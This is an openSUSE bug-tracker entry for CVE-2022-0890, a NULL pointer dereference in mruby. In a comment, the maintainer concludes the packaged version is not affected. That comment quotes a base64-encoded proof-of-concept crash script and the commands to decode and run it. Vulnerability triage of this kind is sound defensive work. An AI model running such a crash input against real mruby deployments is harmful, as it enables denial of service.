Bug 1196950 (CVE-2022-0890) - VUL-0: CVE-2022-0890: mruby: NULL Pointer Dereference prior to 3.2.
Summary: VUL-0: CVE-2022-0890: mruby: NULL Pointer Dereference prior to 3.2.
Status: RESOLVED WORKSFORME
Alias: CVE-2022-0890
Product: openSUSE Tumbleweed
Classification: openSUSE
Component: Security
Version: Current
Hardware: Other Other
: P3 - Medium : Normal
Target Milestone: ---
Assignee: Ferdinand Thiessen
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/325728/#r...
Reported: 2022-03-10 08:16 UTC by Thomas Leroy
Modified: 2022-04-26 19:28 UTC
Comment 1 Thomas Leroy 2022-03-10 08:19:22 UTC
Will probably be shipped in version 3.2, not released yet.
Comment 2 Ferdinand Thiessen 2022-04-26 19:28:08 UTC
Version on Factory not affected, POC does not work.
Probably only the git version is affected, not the 3.0 release (or fixed by other patch).

> % echo -ne 'Yj0iMCIKezA9Pm5pbH0KW11hbmQKYi5jb2RlcG9pbnRze2luc3RhbmNlX2V2YWx7bG9vcC5uZXh0
e30KYi5jb2RlcG9pbnRze0ZpYmVyLm5ld3t9LnRyYW5zZmVyKDAsMCwwLDAsMCwwLDAsMCwwLDAs
MCwwLDAsMCwwKX19fQ==' | base64 -d > poc
> % mruby ./poc
> exit 0